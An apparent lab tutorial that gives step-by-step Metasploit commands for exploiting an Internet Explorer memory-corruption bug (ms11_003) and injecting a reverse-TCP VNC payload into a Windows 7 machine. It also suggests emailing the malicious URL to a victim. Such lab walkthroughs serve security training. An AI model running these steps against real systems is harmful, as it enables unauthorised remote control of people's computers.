Exploiting Client-Side Vulnerabilities and Establishing a VNC Session using Metasploit
Task 01:- Launch Metasploit console.
- Start the Kali Linux and open the command terminal, and type the command msfconsole and press Enter, to Launch the Metasploit console.
Tip:- Msfconsole can also be run from Application → Kali Linux → Top 10 Security tools → metasploit framework.
Tip:- In the Metasploit framework, all modules are Ruby classes.
- The Metasploit console is launched on the Kali Linux machine, as shown in the below screenshot.
- Now, search for exploits in metasploit database for Privilege escalation, to search exploit type search ms11 and press Enter. This command will display the available exploit in the Metasploit Database.
Tip:- Msfconsole includes extensive regular-expression based search functionally. If you have a general idea of what you are looking for you can search for via “search”
Task 02:- Using Browser Exploit for Windows.
- Type use exploit/windows/browser/ms11_003_ie_css_import and press Enter.
Tip:- This module exploits memory curroption vulnerabilities within Microsoft\'s HTML engine (mshtml). When passing an HTML page containing a recursive CSS import, a C++ object is deleted and later reused.
Task 03:- Setting Payload.
- Type set payload windows/vncinject/reverse_tcp and press Enter.
- To check the options available in this exploit, type show options and press Enter.
- In the following screenshot, we can see the LHOST is not set the LPORT in on default port number. Now, we need to set the LHOST and LPORT.
Tip:- If you have selected a specific module, you can issue the ‘show options’ command to display which settings are available and/or required for the specific module.
Task 04:- Setting LHOST and LPORT.
- Type set LHOST [attacker machine IP address i.e. kali linux IP address] and press Enter.
- To set local port, type set LPORT 443 and press Enter.
- Now, verify the options which have set: type show options and press Enter. Now we have set the Local Host (LHOST) and Local Port (LPORT).
Tip:- The ‘set’ command allow you to configure Framework options and parameters for the current module you are working with.
Task 05:- Running Exploit.
- Type exploit and press Enter to run the exploit. This command provide you with a Local IP URL, which can be sent to the Victim’s machine through email or any other source of communication.
- Now, switch to the Window 7 (virtual machine) and open the Internet Explorer; then copy the Local IP URL that is: http://192.168.1.102:8080/FkEF1aT and past is in the address bar and press Enter.
- Once you have clicked Enter, Internet Explorer display a blank screen.
Tip:- Windows client side attack using a browser vulnerability and privilege escalation via task scheduler exploit.
Task 06:- Remote view in Kali Linux.
- Switch to Kali Linux (attacker machine). You can see a Remote Desktop windows with the victim machine opened automatically in the TightVNC windows, as shown in the following figure.
- Minimise the TightVNC remote window, and observe in msfconsole that without any authentication, we have successfully gained access to victim machine.
Tool/Utility
|
Information Collected/Objectives Achieved
|
Metasploit Framework Console (msfconsole)
|
IP Address Range/target:- Windows 7 machine
Scan Result:-
|
No comments:
Post a Comment